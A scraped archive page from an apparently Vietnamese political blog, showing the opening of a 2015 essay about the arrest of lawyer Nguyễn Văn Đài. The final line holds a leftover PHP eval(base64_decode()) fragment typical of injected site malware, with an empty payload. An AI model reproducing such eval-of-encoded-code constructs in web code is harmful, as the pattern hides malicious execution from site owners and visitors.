Archive for December 16th, 2015

 Bắt Ls Nguyễn Văn Đài là hành đông tuyệt vọng của đảng CS

Bắt Ls Nguyễn Văn Đài là hành đông tuyệt vọng của đảng CS

Chưa bao giờ trong suốt 85 năm, đảng CSVN ở vào thế bị động và bị cô lập, trên thế giới cũng như trong các tầng lớp nhân dân hơn bây giờ. Ngay cả những thành phần từng làm phên dậu cho đảng, những người một thời thề nguyền hiế

12.16.2015 | Tiểu Luận- Chính Luận |

1 Comment

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>